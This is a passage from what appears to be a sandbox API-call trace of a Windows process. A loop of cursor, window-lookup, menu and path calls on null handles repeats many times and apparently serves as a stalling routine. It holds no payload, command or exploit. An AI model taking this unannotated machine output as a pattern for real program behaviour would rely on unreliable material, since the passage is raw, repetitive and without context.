lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.686] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.686] GetStockObject (i=6) returned 0x1b00018 [0100.686] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.686] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.686] PathFileExistsW (pszPath=0x0) returned 0 [0100.686] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.686] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.686] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.686] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.686] GetMenu (hWnd=0x0) returned 0x0 [0100.686] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.686] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.686] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.686] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.686] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.686] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.686] GetStockObject (i=6) returned 0x1b00018 [0100.686] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.686] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.687] PathFileExistsW (pszPath=0x0) returned 0 [0100.687] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.687] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.687] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.687] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.687] GetMenu (hWnd=0x0) returned 0x0 [0100.687] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.687] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.687] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.687] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.687] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.687] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.687] GetStockObject (i=6) returned 0x1b00018 [0100.687] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.687] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.687] PathFileExistsW (pszPath=0x0) returned 0 [0100.687] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.687] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.687] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.687] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.687] GetMenu (hWnd=0x0) returned 0x0 [0100.687] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x387) returned -1 [0100.687] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.687] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.687] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.687] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.687] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.687] GetStockObject (i=6) returned 0x1b00018 [0100.687] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.687] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.687] PathFileExistsW (pszPath=0x0) returned 0 [0100.687] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.687] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.687] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.687] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.687] GetMenu (hWnd=0x0) returned 0x0 [0100.687] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.688] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.688] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.688] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.688] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.688] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.688] GetStockObject (i=6) returned 0x1b00018 [0100.688] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.688] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.688] PathFileExistsW (pszPath=0x0) returned 0 [0100.688] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.688] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.688] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.688] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.688] GetMenu (hWnd=0x0) returned 0x0 [0100.688] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.688] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.688] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.688] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.688] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.688] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.688] GetStockObject (i=6) returned 0x1b00018 [0100.688] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.688] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.688] PathFileExistsW (pszPath=0x0) returned 0 [0100.688] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.688] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.688] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.688] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.688] GetMenu (hWnd=0x0) returned 0x0 [0100.688] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.688] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.688] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.688] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.688] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.688] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.688] GetStockObject (i=6) returned 0x1b00018 [0100.689] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.689] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.689] PathFileExistsW (pszPath=0x0) returned 0 [0100.689] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.689] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.689] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.689] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.689] GetMenu (hWnd=0x0) returned 0x0 [0100.689] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.689] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.689] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.689] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.689] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.689] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.689] GetStockObject (i=6) returned 0x1b00018 [0100.689] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.689] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.689] PathFileExistsW (pszPath=0x0) returned 0 [0100.689] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.689] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.689] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.689] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.689] GetMenu (hWnd=0x0) returned 0x0 [0100.689] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x218) returned -1 [0100.689] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.689] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.689] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.689] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.689] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.689] GetStockObject (i=6) returned 0x1b00018 [0100.689] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.689] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.689] PathFileExistsW (pszPath=0x0) returned 0 [0100.689] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.689] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.689] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.690] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.690] GetMenu (hWnd=0x0) returned 0x0 [0100.690] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.690] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.690] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.690] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.690] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.690] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.690] GetStockObject (i=6) returned 0x1b00018 [0100.690] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.690] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.690] PathFileExistsW (pszPath=0x0) returned 0 [0100.690] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.690] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.690] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.690] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.690] GetMenu (hWnd=0x0) returned 0x0 [0100.690] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.690] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.690] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.690] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.690] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.690] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.690] GetStockObject (i=6) returned 0x1b00018 [0100.690] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.690] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.690] PathFileExistsW (pszPath=0x0) returned 0 [0100.690] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.690] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.690] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.690] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.690] GetMenu (hWnd=0x0) returned 0x0 [0100.690] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.690] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.690] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.690] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.690] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.691] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.691] GetStockObject (i=6) returned 0x1b00018 [0100.691] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.691] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.691] PathFileExistsW (pszPath=0x0) returned 0 [0100.691] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.691] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.691] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.691] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.691] GetMenu (hWnd=0x0) returned 0x0 [0100.691] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.691] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.691] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.691] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.691] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.691] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.691] GetStockObject (i=6) returned 0x1b00018 [0100.691] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.691] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.691] PathFileExistsW (pszPath=0x0) returned 0 [0100.691] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.691] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.691] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.692] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.692] GetMenu (hWnd=0x0) returned 0x0 [0100.692] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x95) returned -1 [0100.692] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.692] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.692] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.692] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.692] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.692] GetStockObject (i=6) returned 0x1b00018 [0100.692] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.692] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.692] PathFileExistsW (pszPath=0x0) returned 0 [0100.692] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.692] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.692] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.692] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.692] GetMenu (hWnd=0x0) returned 0x0 [0100.692] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.692] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.692] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.692] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.692] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.692] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.692] GetStockObject (i=6) returned 0x1b00018 [0100.692] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.692] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.692] PathFileExistsW (pszPath=0x0) returned 0 [0100.692] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.692] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.692] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.692] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.692] GetMenu (hWnd=0x0) returned 0x0 [0100.692] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.692] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.693] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.693] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.693] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.693] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.693] GetStockObject (i=6) returned 0x1b00018 [0100.693] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.693] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.693] PathFileExistsW (pszPath=0x0) returned 0 [0100.693] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.693] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.693] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.693] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.693] GetMenu (hWnd=0x0) returned 0x0 [0100.693] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.693] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.693] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.693] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.693] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.693] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.693] GetStockObject (i=6) returned 0x1b00018 [0100.693] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.693] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.693] PathFileExistsW (pszPath=0x0) returned 0 [0100.693] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.693] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.693] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.693] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.693] GetMenu (hWnd=0x0) returned 0x0 [0100.693] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x344) returned -1 [0100.693] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.693] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.693] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.693] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.693] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.693] GetStockObject (i=6) returned 0x1b00018 [0100.693] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.694] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.694] PathFileExistsW (pszPath=0x0) returned 0 [0100.694] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.694] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.694] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.694] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.694] GetMenu (hWnd=0x0) returned 0x0 [0100.694] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x166) returned -1 [0100.694] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.694] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.694] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.694] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.694] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.694] GetStockObject (i=6) returned 0x1b00018 [0100.694] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.694] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.694] PathFileExistsW (pszPath=0x0) returned 0 [0100.694] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.694] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.694] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.694] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.694] GetMenu (hWnd=0x0) returned 0x0 [0100.694] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.694] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.694] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.694] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.694] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.694] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.694] GetStockObject (i=6) returned 0x1b00018 [0100.694] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.694] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.694] PathFileExistsW (pszPath=0x0) returned 0 [0100.694] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.694] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.694] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.694] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.694] GetMenu (hWnd=0x0) returned 0x0 [0100.695] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.695] GetMenuItemID (hMenu=0x0, nPos=-1) returned 